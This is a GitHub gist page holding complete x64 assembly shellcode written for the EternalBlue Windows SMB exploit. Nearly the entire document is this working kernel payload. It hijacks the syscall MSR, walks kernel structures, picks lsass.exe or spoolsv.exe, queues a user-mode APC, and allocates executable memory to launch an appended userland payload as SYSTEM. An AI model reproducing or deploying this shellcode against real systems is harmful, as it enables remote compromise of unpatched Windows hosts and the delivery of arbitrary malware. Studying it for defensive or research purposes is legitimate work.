Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save alcidesmorales/3c2bedd76049e5d13e2f9beee8de5f0c to your computer and use it in GitHub Desktop.
Save alcidesmorales/3c2bedd76049e5d13e2f9beee8de5f0c to your computer and use it in GitHub Desktop.
Windows x64 kernel shellcode for eternalblue exploit
;
; Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
; The shellcode is written for eternalblue exploit:
; - https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a
; - https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e
;
;
; Idea for Ring 3 to Ring 0 from Sean Dillon (@zerosum0x0)
;
;
; Note:
; - The userland shellcode is run in a new thread of system process.
; If userland shellcode causes any exception, the system process get killed.
; - The shellcode do not allocate shadow stack if possible for minimize size
; because some Windows function does not require shadow stack.
; - The userland payload MUST be appened to this shellcode.
;
; Reference:
; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
BITS 64
ORG 0
PSGETCURRENTPROCESS_HASH EQU 0xdbf47c78
PSGETPROCESSID_HASH EQU 0x170114e1
PSGETPROCESSIMAGEFILENAME_HASH EQU 0x77645f3f
LSASS_EXE_HASH EQU 0xc1fa6a5a
SPOOLSV_EXE_HASH EQU 0x3ee083d8
ZWALLOCATEVIRTUALMEMORY_HASH EQU 0x576e99ea
KEINITIALIZEAPC_HASH EQU 0x6d195cc4
KEINSERTQUEUEAPC_HASH EQU 0xafcc4634
PSGETPROCESSPEB_HASH EQU 0xb818b848
CREATETHREAD_HASH EQU 0x835e515e
DATA_PEB_ADDR_OFFSET EQU -0x10
DATA_QUEUEING_KAPC_OFFSET EQU -0x8
DATA_ORIGIN_SYSCALL_OFFSET EQU 0x0
DATA_NT_KERNEL_ADDR_OFFSET EQU 0x8
DATA_KAPC_OFFSET EQU 0x10
section .text
global shellcode_start
shellcode_start:
setup_syscall_hook:
; IRQL is DISPATCH_LEVEL when got code execute
%ifdef WIN7
mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
; set nByteProcessed for trigger free after return
mov ecx, [rdx+0x2c]
mov [rdx+0x38], ecx
%elifdef WIN8
mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
; fix pool pointer (rcx is -0x8150 from controlled argument value)
add rcx, rdx
mov [rdx+0x30], rcx
; set nByteProcessed for trigger free after return
mov ecx, [rdx+0x48]
mov [rdx+0x40], ecx
%endif
call find_data_address_fn
mov r8, rax
; read current syscall
mov ecx, 0xc0000082
rdmsr
; do NOT replace saved original syscall address with hook syscall
lea r9, [rel syscall_hook]
cmp eax, r9d
je _setup_syscall_hook_done
; setting MSR 0xc0000082 is effect only running processor
cmp dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
je _hook_syscall
; save original syscall
mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
; first time on the target, clear the data area
xor edx, edx
mov qword [r8+DATA_NT_KERNEL_ADDR_OFFSET], rdx
mov qword [r8+DATA_QUEUEING_KAPC_OFFSET], rdx
_hook_syscall:
; set a new syscall on running processor
mov rdx, r9
mov eax, edx
shr rdx, 32
wrmsr
_setup_syscall_hook_done:
%ifdef WIN7
xor eax, eax
%elifdef WIN8
xor eax, eax
%endif
ret
;========================================================================
; Find memory address in HAL heap for using as data area
;========================================================================
find_data_address_fn:
; on idle target without user application, next syscall might need to wait >2 minutes
; find some address to store the data, this address MUST not be replaced
; when exploit is rerun before syscall is called
lea rax, [rel _find_data_address_next + 0x1000]
_find_data_address_next:
shr rax, 12
shl rax, 12
sub rax, 0x70 ; for KAPC struct too
ret
syscall_hook:
swapgs
mov qword [gs:0x10], rsp
mov rsp, qword [gs:0x1a8]
push 0x2b
push qword [gs:0x10]
push rax ; want this stack space to store original syscall addr
; save rax first to make this function continue to real syscall
push rax
push rbp ; save rbp here because rbp is special register for accessing this shellcode data
call find_data_address_fn
mov rbp, rax
mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler
mov [rsp+0x10], rax
; save all volatile registers
push rcx
push rdx
push r8
push r9
push r10
push r11
; use lock cmpxchg for queueing APC only once
xor eax, eax
cdq
mov dl, 1
lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
jnz _syscall_hook_done
; allow interrupts while executing shellcode
sti
call r3_to_r0_start
cli
_syscall_hook_done:
pop r11
pop r10
pop r9
pop r8
pop rdx
pop rcx
pop rbp
pop rax
ret
r3_to_r0_start:
; save used non-volatile registers
push r15
push r14
push r13
push rdi
push rsi
push rbx
;======================================
; restore syscall
;======================================
; an error after restoring syscall should never happen
mov ecx, 0xc0000082
mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
wrmsr
;======================================
; find nt kernel address
;======================================
mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET] ; KiSystemCall64 is an address in nt kernel
shr r15, 0xc ; strip to page size
shl r15, 0xc
_x64_find_nt_walk_page:
sub r15, 0x1000 ; walk along page size
cmp word [r15], 0x5a4d ; 'MZ' header
jne _x64_find_nt_walk_page
; save nt address for using in KernelApcRoutine
mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15
;======================================
; get current EPROCESS and ETHREAD
;======================================
mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR
mov edi, PSGETCURRENTPROCESS_HASH
call win_api_direct
xchg r13, rax ; r13 = EPROCESS
; r15 : nt kernel address
; r14 : ETHREAD
; r13 : EPROCESS
;======================================
; find offset of EPROCESS.ImageFilename
;======================================
mov edi, PSGETPROCESSIMAGEFILENAME_HASH
call get_offset_from_fn
mov ecx, eax ; ecx = offset of EPROCESS.ImageFilename
;======================================
; find offset of EPROCESS.ThreadListHead
;======================================
; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
; if offset of ImageFilename is more than 0x400, current is (Win8+)
cmp eax, 0x400 ; ebx is still an offset of EPROCESS.ImageFilename
jb _find_eprocess_threadlist_offset_win7
add eax, 0x10
_find_eprocess_threadlist_offset_win7:
lea rbx, [rax+0x28] ; ebx = offset of EPROCESS.ThreadListHead
;======================================
; find offset of ETHREAD.ThreadListEntry
;======================================
lea r8, [r13+rbx] ; r8 = address of EPROCESS.ThreadListHead
mov r9, r8
; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
_find_ethread_threadlist_offset_loop:
mov r9, qword [r9]
cmp r8, r9 ; check end of list
je _insert_queue_apc_done ; not found !!!
; if (r9 - r14 < 0x700) found
mov rax, r9
sub rax, r14
cmp rax, 0x700
ja _find_ethread_threadlist_offset_loop
sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)
;======================================
; find offset of EPROCESS.ActiveProcessLinks
;======================================
mov edi, PSGETPROCESSID_HASH
call get_offset_from_fn
lea rdx, [rax+8] ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
;======================================
; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
;======================================
; check process name
_find_target_process_loop:
lea rsi, [r13+rcx]
call calc_hash
cmp eax, LSASS_EXE_HASH ; "lsass.exe"
jz found_target_process
cmp eax, SPOOLSV_EXE_HASH ; "spoolsv.exe"
jz found_target_process
; next process
mov r13, [r13+rdx]
sub r13, rdx
jmp _find_target_process_loop
found_target_process:
; The allocation for userland payload will be in KernelApcRoutine.
; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
;======================================
; save process PEB for finding CreateThread address in kernel KAPC routine
;======================================
mov edi, PSGETPROCESSPEB_HASH
mov rcx, r13
call win_api_direct
mov [rbp+DATA_PEB_ADDR_OFFSET], rax
;======================================
; iterate ThreadList until KeInsertQueueApc() success
;======================================
; r15 = nt
; r14 = -(offset of ETHREAD.ThreadListEntry)
; r13 = EPROCESS
; ebx = offset of EPROCESS.ThreadListHead
lea rsi, [r13 + rbx] ; rsi = ThreadListHead address
mov rbx, rsi ; use rbx for iterating thread
_insert_queue_apc_loop:
; TODO: do not try to queue APC if TEB.ActivationContextStackPointer is NULL
; if TEB.ActivationContextStackPointer is NULL, system will be reboot after inserting APC to queue
; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
mov rbx, [rbx+8]
cmp rsi, rbx
je _insert_queue_apc_loop ; skip list head
; KeInitializeApc(PKAPC,
; PKTHREAD,
; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
; PKKERNEL_ROUTINE = kernel_apc_routine,
; PKRUNDOWN_ROUTINE = NULL,
; PKNORMAL_ROUTINE = userland_shellcode,
; KPROCESSOR_MODE = UserMode (1),
; PVOID Context);
lea rcx, [rbp+DATA_KAPC_OFFSET] ; PAKC
xor r8, r8 ; OriginalApcEnvironment
lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine
push rbp ; context
push 1 ; UserMode
push rbp ; userland shellcode (MUST NOT be NULL)
push r8 ; NULL
lea rdx, [rbx + r14] ; ETHREAD
sub rsp, 0x20 ; shadow stack
mov edi, KEINITIALIZEAPC_HASH
call win_api_direct
; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
; SystemArgument1 is second argument in usermode code (rdx)
; SystemArgument2 is third argument in usermode code (r8)
lea rcx, [rbp+DATA_KAPC_OFFSET]
;xor edx, edx ; no need to set it here
;xor r8, r8 ; no need to set it here
xor r9, r9
mov edi, KEINSERTQUEUEAPC_HASH
call win_api_direct
add rsp, 0x40
; if insertion failed, try next thread
test eax, eax
jz _insert_queue_apc_loop
mov rax, [rbp+DATA_KAPC_OFFSET+0x10] ; get KAPC.ApcListEntry
; EPROCESS pointer 8 bytes
; InProgressFlags 1 byte
; KernelApcPending 1 byte
; if success, UserApcPending MUST be 1
cmp byte [rax+0x1a], 1
je _insert_queue_apc_done
; manual remove list without lock
mov [rax], rax
mov [rax+8], rax
jmp _insert_queue_apc_loop
_insert_queue_apc_done:
; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
_r3_to_r0_done:
pop rbx
pop rsi
pop rdi
pop r13
pop r14
pop r15
ret
;========================================================================
; Call function in specific module
;
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
; edi = hash of target function name
;========================================================================
win_api_direct:
call get_proc_addr
jmp rax
;========================================================================
; Get function address in specific module
;
; Arguments: r15 = module pointer
; edi = hash of target function name
; Return: eax = offset
;========================================================================
get_proc_addr:
; Save registers
push rbx
push rcx
push rsi ; for using calc_hash
; use rax to find EAT
mov eax, dword [r15+60] ; Get PE header e_lfanew
add rax, r15
mov eax, dword [rax+136] ; Get export tables RVA
add rax, r15
push rax ; save EAT
mov ecx, dword [rax+24] ; NumberOfFunctions
mov ebx, dword [rax+32] ; FunctionNames
add rbx, r15
_get_proc_addr_get_next_func:
; When we reach the start of the EAT (we search backwards), we hang or crash
dec ecx ; decrement NumberOfFunctions
mov esi, dword [rbx+rcx*4] ; Get rva of next module name
add rsi, r15 ; Add the modules base address
call calc_hash
cmp eax, edi ; Compare the hashes
jnz _get_proc_addr_get_next_func ; try the next function
_get_proc_addr_finish:
pop rax ; restore EAT
mov ebx, dword [rax+36]
add rbx, r15 ; ordinate table virtual address
mov cx, word [rbx+rcx*2] ; desired functions ordinal
mov ebx, dword [rax+28] ; Get the function addresses table rva
add rbx, r15 ; Add the modules base address
mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA
add rax, r15 ; Add the modules base address to get the functions actual VA
pop rsi
pop rcx
pop rbx
ret
;========================================================================
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
;
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
;========================================================================
calc_hash:
push rdx
xor eax, eax
cdq
_calc_hash_loop:
lodsb ; Read in the next byte of the ASCII string
ror edx, 13 ; Rotate right our hash value
add edx, eax ; Add the next byte of the string
test eax, eax ; Stop when found NULL
jne _calc_hash_loop
xchg edx, eax
pop rdx
ret
;========================================================================
; Get offset of structure member from Windows function that simply return value of struct member.
;
; Arguments: r15 = module pointer
; edi = hash of target function name
; Return: eax = offset
;========================================================================
get_offset_from_fn:
call get_proc_addr
cmp byte [rax+2], 0x80
ja _get_offset_dword
movzx eax, byte [rax+3]
ret
_get_offset_dword:
mov eax, dword [rax+3]
ret
; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
;
; VOID KernelApcRoutine(
; IN PKAPC Apc,
; IN PKNORMAL_ROUTINE *NormalRoutine,
; IN PVOID *NormalContext,
; IN PVOID *SystemArgument1,
; IN PVOID *SystemArgument2)
kernel_kapc_routine:
push rbp
push rdi
push rsi
push r14
push r15
mov rbp, [r8] ; *NormalContext is our data area pointer
mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
mov rsi, rdx
mov r14, r9
;======================================
; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
;======================================
xor eax, eax
mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
; rdx is already address of baseAddr
mov [rdx], rax ; baseAddr = 0
mov ecx, eax
not rcx ; ProcessHandle = -1
mov r8, rax ; ZeroBits
mov al, 0x40 ; eax = 0x40
push rax ; PAGE_EXECUTE_READWRITE = 0x40
shl eax, 6 ; eax = 0x40 << 6 = 0x1000
push rax ; MEM_COMMIT = 0x1000
; reuse r9 for address of RegionSize
mov [r9], rax ; RegionSize = 0x1000
sub rsp, 0x20 ; shadow stack
mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
call win_api_direct
add rsp, 0x30
; check error
test eax, eax
jnz _kernel_kapc_routine_exit
;======================================
; copy userland payload
;======================================
mov rdi, [rsi]
lea rsi, [rel userland_start]
mov ecx, 0x800 ; fix payload size to 2048 bytes
rep movsb
;======================================
; find CreateThread address (in kernel32.dll)
;======================================
mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
; now the PEB address in memory is not needed anymore, allow other hijacked system call to run shellcode
mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl ; ecx is 0 because of 'rep movsb'
mov rdx, [rax + 0x18] ; PEB->Ldr
mov rdx, [rdx + 0x20] ; InMemoryOrder list
_find_kernel32_dll_loop:
mov rdx, [rdx] ; first one always be executable
; offset 0x38 (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)
; offset 0x50 => is name
; offset 0x20 => is dllbase
;cmp word [rdx+0x38], 0x40
;jne _find_kernel32_dll_loop
cmp word [rdx+0x48], 0x18
jne _find_kernel32_dll_loop
mov rax, [rdx+0x50]
; check only "32" because name might be lowercase or uppercase
cmp dword [rax+0xc], 0x00320033 ; 3\x002\x00
jnz _find_kernel32_dll_loop
mov r15, [rdx+0x20]
mov edi, CREATETHREAD_HASH
call get_proc_addr
; save CreateThread address to SystemArgument1
mov [r14], rax
_kernel_kapc_routine_exit:
; restore IRQL to APC_LEVEL
push 1
pop rcx
mov cr8, rcx
pop r15
pop r14
pop rsi
pop rdi
pop rbp
ret
userland_start:
userland_start_thread:
; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
xchg rdx, rax ; rdx is CreateThread address passed from kernel
xor ecx, ecx ; lpThreadAttributes = NULL
push rcx ; lpThreadId = NULL
push rcx ; dwCreationFlags = 0
mov r9, rcx ; lpParameter = NULL
lea r8, [rel userland_payload] ; lpStartAddr
mov edx, ecx ; dwStackSize = 0
sub rsp, 0x20
call rax
add rsp, 0x30
ret
userland_payload:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment